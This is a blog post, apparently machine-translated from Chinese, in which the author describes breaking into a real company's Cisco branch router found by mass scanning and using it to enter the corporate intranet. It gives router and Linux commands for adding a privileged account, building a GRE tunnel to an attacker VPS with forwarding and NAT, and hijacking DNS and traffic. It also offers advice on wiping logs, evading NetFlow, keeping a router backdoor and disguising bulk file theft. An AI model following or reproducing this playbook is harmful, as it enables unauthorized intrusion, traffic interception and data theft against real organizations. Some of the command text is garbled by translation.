Aquaboutic | Focus Security Research | Vulnerability Exploit | POC


using the intruded router to enter the intranet

Posted by ulberg at 2020-03-21

0x01 control router

At present, only Cisco routers are used, but the methods are not limited to Cisco, Huawei and juniper.

There is no good way to do this. We have caught some routers by using distributed scanning, plus other loopholes, with a certain number of test guarantees.

Choose a Cisco C800 series small business router (very old)

Figure 1 router version

After going in, first check the log and log in the authentication related information.

Figure 2 router login and other related information

There is an ACL with login restriction, which I deleted before, so I found the telnet password. At the same time, if AAA Authentication is not enabled, there will be no authentication server, only local authentication. There is no log server configuration, even SNMP is not configured (I wanted to leave a back door for SNMP, which seems to be out of order).

Quickly add the account password, strengthen the router, and fix the vulnerability.

Figure 3 add privileged account

0x02 network topology analysis

After the basic operation, keep a complete configuration (this cannot be pasted out completely) and analyze the basic network architecture.

The general introduction is that this is a small branch of the company. It accesses the Internet through PPPoE and NAT. It has a public IP address and an internal network address of 10.xx.xx.0/24. It is connected to the main company through the GRE tunnel and has a larger internal network.

This kind of network form is the most common, through ISP dial-up to obtain the public network address, and then the intranet machine through the NAT network. The company network with IP address of the whole public network is very rare.

Figure 4 network topology

0x03 prepare to enter the Intranet

Intranet machines access Google through NAT, while the intranet is protected by Nat. We control the router R1, which is at the exit of the internal network; there is also a public VPS, Ubuntu 12.04. R2 means many routers without control permission.

More information is needed for intranet penetration testing. In addition, we add a public VPS (win2008r) to set up a traffic monitoring server on it to analyze the daily traffic and behavior of the intranet.

Win2008 is a NetFlow server. NetFlow is configured on R1 to observe intranet traffic information. There are many NetFlow software on the Internet, Solarwind is the best, supports SQL Server 2005, can store a large number of data, no cracked version was found. The ManageEngine I use is full of cracked versions.

NetFlow configuration:

ip flow-export so int e 0 ip flow-ex dst 8888 ip flow-ex ver 5 ……

Figure 6 overview of target network traffic

Figure 7 flow classification diagram

I can't open the web pages after I count the web traffic and try to open them. They are all prompt 404 not found or certificate error. In this way, we can't see what website we are visiting. Google doesn't have any search records, so we can barely look at the same site of Bing. The result records are still very few.

In order to find out the more detailed information of the intranet (what is the name of the company, what websites the employees often log on, and what is the commonly used software), we have to hijack DNS first. Due to the bad network environment, there is a NAT that makes the network too complex. Therefore, we do not choose to use transparent hijacking mode, but choose to use gateway hijacking mode.

Explain the following terms:

Transparent hijacking method: user defined term, that is, the source IP address and destination IP address of the packet are not modified, only the data and checksum of the packet are modified. In this way, users and servers will not be aware of anything, and they will be completely transparent. At the same time, they will not be able to be detected by killing the soft firewall IPS, except for adding some delay.

Gateway hijacking mode: as the name implies, as a gateway, it routes and NAT the traffic passing through me, so that the traffic can be transmitted on the Internet normally. It will have a great impact. Take Gmail as an example, it will prompt you to log in from other places.

There is a side about hijacking (I summarize): in the environment of firewall or NAT, where do you hijack traffic, you must send the packets (hijacked packets or the packets returned) back there.

Here's an explanation. It's very troublesome to hijack the traffic of GRE channel in the environment of NAT Internet access. The outgoing packet first enters GRE tunnel as a GRE packet, and then goes through NAT as a GRE packet. That is to say, nat only takes effect on GRE packets, and records the status, and does not NAT the packets contained in GRE. Therefore, the incoming packet cannot go through NAT. This interpretation applies to firewalls.

Because of the limited programming ability, we decided to use the gateway hijacking mode.

Set up GRE tunnel on the public network port of R1 and my Linux eth0

Linux IP address:

Router public IP address:

Configuration of R1

en conf t int tunnel 1 tunnel so e0(接口名称,也可以使用接口IP地址,但是会出问题) tunnel dest ip add end linux Ubuntu 配置: 建立GRE Tunnel #modprobe ip_gre #lsmode | grep #ip tunnel add gre1 mode gre remote local ttl 255 #ip link set gre1 up #ip addr add peer dev gre1

Ping the IP address of the opposite end at both ends of the tunnel. It should be connected.

Then turn on route forwarding

Change the value of / proc / sys / net / IP "forward to 1 (valid this time, invalid after restart)

Modify the / etc / sysctl.conf file so that packet forwarding takes effect when the system starts

Net. IPv4. IP ා forward = remove the ා sign in front of 1

Enable NAT of iptables

The address of 192 is the address that needs to be NAT, and the address of 202 is the existing IP address of the public network. The configuration word takes effect and becomes invalid after restart.

Save the rules for iptables.

#service iptables save

Add intranet route

route add -net gre1

All the 8-bit networks leading to take the exit of GRE1, that is to say, all the networks take the GRE tunnel.

Then we use our own software to obtain DNS data content, which is not easy to post.

There are Telnet, SSH and other traffic in the traffic, but they can't be hijacked. The destination address is restricted by ACL, and my Linux can't access them, so I can use them directly.

0x04 access to Intranet

Traffic can't help me get access to the intranet, so I can only enter the intranet by myself.

Forcibly hijack a legitimate IP address that no one uses in the intranet, and assign it to yourself through connecting to Linux OpenVPN. All that remains is to add the host route of this address in the router and the default route added to 10.xx.xx.xx/8 on Linux, and then my workstation gets access to the intranet (without any restrictions like VPN, access rights are equivalent to router rights).

How to get your own workstation into the intranet is very arbitrary. There are too many methods, because this Ubuntu is already in the intranet at this time. OpenVPN configuration and add route configuration will not be posted out. There are too many on the network.

Figure 8 verify the connectivity of Ubuntu to the Intranet

Such intranet penetration has the following advantages:

All your traffic will be considered as intranet traffic by the intranet traffic device. For the intranet with slightly larger traffic, you can download files at will, and you don't need to worry about the alarm caused by excessive traffic. (theory, no papers)

Do a good job of hiding on the router, avoid NetFlow monitoring, remove the log, and directly erease all the memory before leaving. Your behavior cannot be checked in the intranet. (theory, not done)

If the address hijacking is appropriate, it can bypass the login restriction (three-tier restriction) of the intranet server.

A good grasp of time can create the illusion that an intranet employee downloads a large number of files from the file server. (theory, not done)


One is that packets are not encrypted, which is annoying. Packets are basically transparent. If there is no security device outside the router or a direct IPSec tunnel, it is equivalent to no defect.

In conclusion, it has a high degree of concealment, which is far higher than VPN, Ma and so on. Even the log server can ignore him.

The title of this paper is to enter the internal network, not the internal network penetration, not to do the internal network penetration related research.

All sensitive information has been modified and erased.

0x05 later

Other small discussions

There are many researches on link delay, so we need to say more. Take my hijacked Google as an example. I'm near Google and the intranet path, and I'm near the end of Google.

The average delay to Google is 0.617ms

Figure 9 Ubuntu to Google delay

The average delay from router to Linux is 256ms, and the average delay when router directly Ping Google is 180ms

Figure 10 screenshot of router network delay

Linux deals with hijacking data, and the software delay of modifying data package is about 5ms, so it is estimated that the delay after hijacking should be about 260ms.

However, after hijacking, the delay to the target is 248, which is less than 256ms + 0.6ms + 5ms. As for why, it cannot be explained.

The overall delay effect increased by one third of 180ms and about 60ms.

Before, we had a lot of discussion on delay: by increasing the delay by one third, the impact will be more obvious, and it is easy to be detected so as to trigger an alarm. I personally think that everyone's delay on Baidu is 500ms or 1s higher than usual. Even after checking the IP address and watching tracert, Baidu's operation and maintenance will scold the operators. What's more, ordinary network users don't think it's the problem of operators, they just think it's their own computer card. Maybe someone doubts that they are hijacked by the network.

The router studied in this paper is a network boundary router with at least one public IP address. When the router or layer 3 switch is in the intranet, the answer is whether the hijacking can be used. Through the establishment of a seven layer application layer tunnel (GRE is a three-layer network layer tunnel), just like our personal computers, through the intranet. Or directly establish a connection with a server in the intranet, hijack data (after verification, but in the public network test, the opposite end is a public Cisco router 2911, no server has been tried, and the development capacity is limited).

If you need to penetrate the intranet, you need the application layer VPN, such as IPSec VPN, EZ VPN (I tested these two, and other VPNs higher than three layers are theoretically feasible). The configuration is much more complex than GRE tunnel, but it is very simple to understand the principle configuration. Configuration can't be finished. In theory, the IP sec VPN should be able to establish a connection to the IP sec VPN server. I have not succeeded, but I am still studying it at the theoretical level. EZ VPN, Cisco proprietary, can't build servers on win or Linux.

As for residency, it's much better to extend intranet residency or router back door residency through router than horse. Besides NSA and fireeye, no one has ever contacted router back door. There are few people who can configure routers, let alone reverse check.

As for the traffic hijacking software, there are many hijacking software on the Internet, but in fact, no one can be used directly when it is found. Especially in the transparent hijacking mode, no one can be used directly, such as any mitmproxy or any other. Everyone has said that the actual test is also suitable for developers to debug the software, so they can only develop by themselves, but the development ability is limited.

I hope you can recommend some software that can handle large traffic (such as BGP hijacking) with high efficiency.